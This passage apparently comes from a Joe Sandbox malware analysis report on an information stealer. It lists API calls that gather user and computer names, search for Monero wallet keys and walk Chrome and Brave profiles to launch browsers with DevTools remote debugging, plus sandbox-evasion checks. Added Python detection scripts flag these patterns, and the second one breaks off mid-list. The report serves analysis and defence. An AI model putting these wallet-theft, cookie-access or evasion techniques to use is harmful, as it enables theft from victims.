                                        • Part of subcall function 00F279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F27A17
                                        • Part of subcall function 00F279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F27A2F
                                        • Part of subcall function 00F27A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27AA0
                                        • Part of subcall function 00F27A70: RtlAllocateHeap.NTDLL(00000000), ref: 00F27AA7
                                        • Part of subcall function 00F27A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00F27ABF
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01D89158,?,00F310F4,?,00000000,?,00F310F8,?,00000000,00F30AF3), ref: 00F26D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F26D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00F26D99
                                      • Sleep.KERNEL32(00001770), ref: 00F26DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01D89158,?,00F310F4,?,00000000,?,00F310F8,?,00000000,00F30AF3), ref: 00F26DBA
                                      • ExitProcess.KERNEL32 ref: 00F26DC2
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: da9b206631ac6dfb90671fb8d4427d6ba5fa5dde1714a11a968bbb4cf429b448
                                      • Instruction ID: 43553b0a3ffd31e45a23e5a9ce45da3c34b183f2a84ce19a4dca60ffdba355a0
                                      • Opcode Fuzzy Hash: da9b206631ac6dfb90671fb8d4427d6ba5fa5dde1714a11a968bbb4cf429b448
                                      • Instruction Fuzzy Hash: DB310F71A44228ABDB08F7F0EC67BEE7379BF44310F500928F512A6181DF789945E762

                                      Control-flow Graph (image not reproduced; basic blocks and edges recovered from the graph data)
                                      • f11220-f11247: call f28b40, GlobalMemoryStatusEx; branches to f11273-f1127a or f11249-f11271
                                      • f11249-f11271: call f2dd30 twice (the two __aulldiv calls at 00F11258 and 00F11266); then f11281-f11285
                                      • f11273-f1127a: then f11281-f11285
                                      • f11281-f11285: branches to f11287 or f1129a-f1129d
                                      • f11287: branches to f11292-f11294 or f11289-f11290
                                      • f11289-f11290: branches to f1129a-f1129d or f11292-f11294
                                      • f11292-f11294: ExitProcess
                                      • f1129a-f1129d: terminal block on the path that does not reach ExitProcess
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F1123E
                                      • __aulldiv.LIBCMT ref: 00F11258
                                      • __aulldiv.LIBCMT ref: 00F11266
                                      • ExitProcess.KERNEL32 ref: 00F11294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: same 14 dump files as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: 0494f2afdc94cb5f0c4f041d671b193e72471bfa11c238b29da414d428b333c2
                                      • Instruction ID: 62c66a7791f57f06a7e33d624c8867388471ef92bc28f1fd7884eef823851c7e
                                      • Opcode Fuzzy Hash: 0494f2afdc94cb5f0c4f041d671b193e72471bfa11c238b29da414d428b333c2
                                      • Instruction Fuzzy Hash: 6F016DB0D40318BBEF10DFE0DC4ABEEBBB8BB14705F608458E704BA1C0C67855859B99

                                      Control-flow Graph (image not reproduced; basic blocks and edges recovered from the graph data)
                                      • f26d93: then f26daa
                                      • f26daa: branches to f26d5a-f26d77 or f26dac-f26dc2
                                      • f26d5a-f26d77: call f2ade0, OpenEventA; branches to f26d95-f26da4 or f26d79-f26d91
                                      • f26d95-f26da4: CloseHandle, Sleep; back to f26daa (loop while the named event already exists)
                                      • f26d79-f26d91: call f2ade0, CreateEventA; then f26dac-f26dc2
                                      • f26dac-f26dc2: call f26bc0, call f25d60, CloseHandle, ExitProcess
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01D89158,?,00F310F4,?,00000000,?,00F310F8,?,00000000,00F30AF3), ref: 00F26D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F26D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00F26D99
                                      • Sleep.KERNEL32(00001770), ref: 00F26DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01D89158,?,00F310F4,?,00000000,?,00F310F8,?,00000000,00F30AF3), ref: 00F26DBA
                                      • ExitProcess.KERNEL32 ref: 00F26DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: same 14 dump files as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 4978723f60ae4e9a92f4d3085d6d5d4b7131c4f99d7151fdb7c6ca8fa3ac46fc
                                      • Instruction ID: 30938dab23974298ab8f2d20bc0b81dedb757070d7c33a6e63d42b4549dc9d0f
                                      • Opcode Fuzzy Hash: 4978723f60ae4e9a92f4d3085d6d5d4b7131c4f99d7151fdb7c6ca8fa3ac46fc
                                      • Instruction Fuzzy Hash: 3AF0FE30A44229EFEB14ABE0FD0ABBD77B4AF14711F900525F922E91C5CBB45940EB95

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F14889
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14899
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: same 14 dump files as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1274457161-4251816714
                                      • Opcode ID: 72d43f2e395a970e5b858a36951884d8bbebe81c0956cf0e3036346ebdc8bb37
                                      • Instruction ID: a716bdbafd798c2200f47e3de1b8fa0dd5b141b9939cab145d8f363f2f5d5983
                                      • Opcode Fuzzy Hash: 72d43f2e395a970e5b858a36951884d8bbebe81c0956cf0e3036346ebdc8bb37
                                      • Instruction Fuzzy Hash: E1211FB1D00209ABDF14DFA4EC45ADD7B75FB45321F108625F925A72C0DB746A05CF91

                                      APIs
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F162D0: InternetOpenA.WININET(00F30DFF,00000001,00000000,00000000,00000000), ref: 00F16331
                                        • Part of subcall function 00F162D0: StrCmpCA.SHLWAPI(?,01D8E958), ref: 00F16353
                                        • Part of subcall function 00F162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F16385
                                        • Part of subcall function 00F162D0: HttpOpenRequestA.WININET(00000000,GET,?,01D8E3C8,00000000,00000000,00400100,00000000), ref: 00F163D5
                                        • Part of subcall function 00F162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F1640F
                                        • Part of subcall function 00F162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F16421
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F25478
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: same 14 dump files as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: 2c312c40f830acdecb806f2d064cc5d82c334b198cd0d2c6441fb5eea697bc2c
                                      • Instruction ID: 1828cbb3e5bf76b276e56727c726c36ea6f5ee557b27ef33f726f5837809533d
                                      • Opcode Fuzzy Hash: 2c312c40f830acdecb806f2d064cc5d82c334b198cd0d2c6441fb5eea697bc2c
                                      • Instruction Fuzzy Hash: 901129709001189BCB14FFA4ED63EED7339AF50340F804558F91A57492EF38AB48EB51
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27AA0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F27AA7
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 00F27ABF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: same 14 dump files as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateComputerNameProcess
                                      • String ID:
                                      • API String ID: 1664310425-0
                                      • Opcode ID: ac413e32905b92376580f98ef9edba2a4ce2c7e6fefd7875b5778f8dd9e042fa
                                      • Instruction ID: 00a19f455463bb233c18bd18a32dae6b45e46b29a18369b0e2c0fb5248e6f6ee
                                      • Opcode Fuzzy Hash: ac413e32905b92376580f98ef9edba2a4ce2c7e6fefd7875b5778f8dd9e042fa
                                      • Instruction Fuzzy Hash: 8801D6B1908359ABD714DFC8E845BAFBBB8F704720F10012AF511E72C0D7745A009BE1
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F1112B
                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00F11132
                                      • ExitProcess.KERNEL32 ref: 00F11143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: same 14 dump files as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: f3916820b053aa1e0a9ecd5c53dc210ae03a6c040d215f3d5a7bf690fa3f99ed
                                      • Instruction ID: f9cd34d54703f1ab52c0f971fa2bc3c977b25b45822b19be8bb7e9e86e5ebadc
                                      • Opcode Fuzzy Hash: f3916820b053aa1e0a9ecd5c53dc210ae03a6c040d215f3d5a7bf690fa3f99ed
                                      • Instruction Fuzzy Hash: B8E08670D45308FBF724ABD09C0AB4C76ACAB04B11F100154F7187A1C0C6B425C05798
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00F110B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00F110F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: same 14 dump files as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 36dd01f4ac3a1a5450a46b6d091a443e2b94739358673796c91fd555c9c87b67
                                      • Instruction ID: 6357330905e7bbb11581a0aaf469279dc581f16b9abdc324f5fd7e6c69d67477
                                      • Opcode Fuzzy Hash: 36dd01f4ac3a1a5450a46b6d091a443e2b94739358673796c91fd555c9c87b67
                                      • Instruction Fuzzy Hash: 42F082B1A41318BBE7289AE4AC59FAEB7D8F709B55F300458F604E7280D5719E40DBA4
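The four API lists above (GlobalMemoryStatusEx with two __aulldiv calls then ExitProcess; the OpenEventA/CreateEventA/Sleep loop ending in ExitProcess; GetCurrentProcess/VirtualAllocExNuma then ExitProcess; and the VirtualAlloc of 0x17C841C0 = 399,000,000 bytes immediately released with VirtualFree) are the raw material for triaging this sample's sandbox checks. The Python below is an added example for this page, not Joe Sandbox code and not code recovered from file.exe: it parses the report's "APIs" bullet lines and flags those chains. The sample inputs are the bullet lines copied from the blocks above; the thresholds LARGE_ALLOC_BYTES and LONG_SLEEP_MS are triage assumptions, not values extracted from the sample.

```python
"""Flag sandbox-evasion API chains in the per-function "APIs" lists of a
Joe Sandbox report. Added example: not Joe Sandbox code and not code from
the analysed sample. LARGE_ALLOC_BYTES and LONG_SLEEP_MS are assumed
triage thresholds, not values recovered from file.exe."""
from __future__ import annotations

import re
from dataclasses import dataclass

# One "APIs" bullet as the report prints it, with or without an argument
# list and with or without the "Part of subcall function" prefix.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int
    subcall: int | None  # callee address when the report marks it as a subcall


def parse_api_block(text: str) -> list[ApiCall]:
    """Parse the bullet lines of one function's "APIs" section, in order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
    return calls


def hex_arg(call: ApiCall, index: int) -> int | None:
    """Argument `index` as an int, or None when the report printed '?' or omitted it."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


LARGE_ALLOC_BYTES = 256 * 1024 * 1024  # assumed triage threshold
LONG_SLEEP_MS = 5_000                  # assumed triage threshold


def flag_evasion(calls: list[ApiCall]) -> list[str]:
    """Return findings for known evasion chains in one function's API list."""
    names = [c.name for c in calls]
    exits = "ExitProcess" in names
    findings = []
    if "GlobalMemoryStatusEx" in names and exits:
        findings.append("RAM-size probe: GlobalMemoryStatusEx then ExitProcess")
    if "VirtualAllocExNuma" in names and exits:
        findings.append("NUMA probe: VirtualAllocExNuma then ExitProcess")
    if {"OpenEventA", "CreateEventA", "Sleep"} <= set(names):
        findings.append("named-event instance check: OpenEventA/Sleep loop, then CreateEventA")
    for c in calls:
        if c.name == "VirtualAlloc" and "VirtualFree" in names:
            size = hex_arg(c, 1)  # dwSize is the second VirtualAlloc argument
            if size is not None and size >= LARGE_ALLOC_BYTES:
                findings.append(f"transient VirtualAlloc of {size:,} bytes "
                                f"({size / 2**20:.1f} MiB) followed by VirtualFree")
        if c.name == "Sleep":
            ms = hex_arg(c, 0)  # dwMilliseconds
            if ms is not None and ms >= LONG_SLEEP_MS:
                findings.append(f"Sleep({ms} ms)")
    return findings


# Sample input: bullet lines copied from the function blocks of this report.
MEMORY_CHECK = """
• GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F1123E
• __aulldiv.LIBCMT ref: 00F11258
• __aulldiv.LIBCMT ref: 00F11266
• ExitProcess.KERNEL32 ref: 00F11294
"""
EVENT_LOOP = """
• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01D89158,?,00F310F4,?,00000000,?,00F310F8,?,00000000,00F30AF3), ref: 00F26D6A
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F26D88
• CloseHandle.KERNEL32(00000000), ref: 00F26D99
• Sleep.KERNEL32(00001770), ref: 00F26DA4
• CloseHandle.KERNEL32(?,00000000,?,01D89158,?,00F310F4,?,00000000,?,00F310F8,?,00000000,00F30AF3), ref: 00F26DBA
• ExitProcess.KERNEL32 ref: 00F26DC2
"""
NUMA_CHECK = """
• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F1112B
• VirtualAllocExNuma.KERNEL32(00000000), ref: 00F11132
• ExitProcess.KERNEL32 ref: 00F11143
"""
BIG_ALLOC = """
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00F110B3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00F110F7
"""

if __name__ == "__main__":
    for label, block in [("memory", MEMORY_CHECK), ("event", EVENT_LOOP),
                         ("numa", NUMA_CHECK), ("alloc", BIG_ALLOC)]:
        for finding in flag_evasion(parse_api_block(block)):
            print(f"{label}: {finding}")
```

The parser only matches bullets of the "Name.MODULE(args), ref: ADDR" shape, so a whole function block (including the "Source File" and "Associated" bullets) can be fed in unchanged. Arguments the report could not resolve are printed as "?" and come back as None from hex_arg, which is why the size and sleep checks test for None before comparing; raise or lower the two thresholds to suit the memory and timeout configuration of the sandbox you operate.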
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 9abd8c2d7bb2f0b6e9c8e67a02c874893718e9734146649928c20bc16c4acf09
                                      • Instruction ID: 38f7324f8b8469445316f3bf9ab1f7902c7b35e119ab9aab61860e051b6562d5
                                      • Opcode Fuzzy Hash: 9abd8c2d7bb2f0b6e9c8e67a02c874893718e9734146649928c20bc16c4acf09
                                      • Instruction Fuzzy Hash: 6E01B17640C708CFD302BFA9D88547EF7E9EFE8209F02C92DD6C283A14EA3164418A52
                                      APIs
                                        • Part of subcall function 00F27A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27AA0
                                        • Part of subcall function 00F27A70: RtlAllocateHeap.NTDLL(00000000), ref: 00F27AA7
                                        • Part of subcall function 00F27A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00F27ABF
                                        • Part of subcall function 00F279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F111B7), ref: 00F27A10
                                        • Part of subcall function 00F279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F27A17
                                        • Part of subcall function 00F279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F27A2F
                                      • ExitProcess.KERNEL32 ref: 00F111C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 3550813701-0
                                      • Opcode ID: c22ddf63d0672824e2489c9080034cd558e1dd89cc833fd5b45aac162db992ea
                                      • Instruction ID: f99289bcd2039f1e0f0539830e2fe5bc02bf4861dbf1e160cc8252e09b1d74f1
                                      • Opcode Fuzzy Hash: c22ddf63d0672824e2489c9080034cd558e1dd89cc833fd5b45aac162db992ea
                                      • Instruction Fuzzy Hash: 01E017B5D0531167DA2877F4BC17B6B32CC6B6435AF000828FA1896146EE29E881A7A6
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00F30B32,00F30B2F,00000000,?,?,?,00F31450,00F30B2E), ref: 00F1BEC5
                                      • StrCmpCA.SHLWAPI(?,00F31454), ref: 00F1BF33
                                      • StrCmpCA.SHLWAPI(?,00F31458), ref: 00F1BF49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1C8A9
                                      • FindClose.KERNEL32(000000FF), ref: 00F1C8BB
                                      Strings
                                      • Google Chrome, xrefs: 00F1C6F8
                                      • Preferences, xrefs: 00F1C104
                                      • \Brave\Preferences, xrefs: 00F1C1C1
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00F1C534
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00F1C495
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00F1C3B2
                                      • Brave, xrefs: 00F1C0E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-1869280968
                                      • Opcode ID: 9115e0a0451433d6706e07e3cb88f268cb3e036c6706467f1c68f113985ecc49
                                      • Instruction ID: a841d80df775a904cf445ebf6394d60e29365f4008fdfaea8919baf42e16b206
                                      • Opcode Fuzzy Hash: 9115e0a0451433d6706e07e3cb88f268cb3e036c6706467f1c68f113985ecc49
                                      • Instruction Fuzzy Hash: 385229729501189BCB14FBB0ED66EEE737DAF94304F404599F50666081EF389B88DFA2
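The string table of this function (Google Chrome, Brave, Preferences, \Brave\Preferences, with \Monero\wallet.keys appearing among the arguments of a subcall) together with the FindFirstFileA / FindNextFileA loop shows it walking Chromium browser profile directories, and the fragment --remote-debugging-port=9229 --profile-directory=" is the command line such a program builds to start the browser with its DevTools remote-debugging endpoint listening on TCP port 9229 for a chosen profile. The report does not show what the sample does with that endpoint afterwards; as a general fact about Chromium, anything that can reach the endpoint can drive the browser through the DevTools protocol, including reading the profile's cookies. For a defender the launch itself is the observable: a Chromium-family browser started with --remote-debugging-port by a parent that is not the browser. The following is an added example, not code from this report or from the analysed sample, that applies that check to process-creation events. The event field names (Image, ParentImage, CommandLine) follow Sysmon event ID 1 and are an assumption about the log source; the sample events are constructed.

```python
"""Hunt for Chromium-family browsers launched with DevTools remote debugging.

Added example; not code from the Joe Sandbox report or from the analysed sample.
Event field names (Image, ParentImage, CommandLine) follow Sysmon event ID 1
and are an assumption about the log source; SAMPLE_EVENTS are constructed.
"""
import re
from typing import Dict, Iterable, List, Optional

# Browsers that honour --remote-debugging-port (Chromium family).
CHROMIUM_BROWSERS = {"chrome.exe", "brave.exe", "msedge.exe", "opera.exe", "vivaldi.exe"}

# The fragment from the sample's string table, with the two values worth triaging captured:
#   --remote-debugging-port=9229 --profile-directory="Default"
REMOTE_DEBUG_RE = re.compile(
    r'--remote-debugging-port=(?P<port>\d+)'
    r'(?:.*?--profile-directory="(?P<profile>[^"]*)")?',
    re.IGNORECASE,
)


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for a browser started with remote debugging, else None."""
    child = image_name(event.get("Image", ""))
    if child not in CHROMIUM_BROWSERS:
        return None                      # notepad.exe carrying the flag is noise, not a browser
    match = REMOTE_DEBUG_RE.search(event.get("CommandLine", ""))
    if match is None:
        return None
    parent = image_name(event.get("ParentImage", ""))
    # The browser re-spawns itself for helper processes; an unrelated parent
    # (an executable in %TEMP%, a script host, an Office process) is the case to triage.
    severity = "low" if parent == child else "high"
    return {
        "browser": child,
        "parent": parent,
        "port": int(match.group("port")),
        "profile": match.group("profile"),   # None when no --profile-directory was given
        "severity": severity,
    }


def hunt(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Apply classify() to a stream of process-creation events, keeping only findings."""
    return [f for f in (classify(e) for e in events) if f is not None]


# Constructed process-creation events (not taken from the report).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
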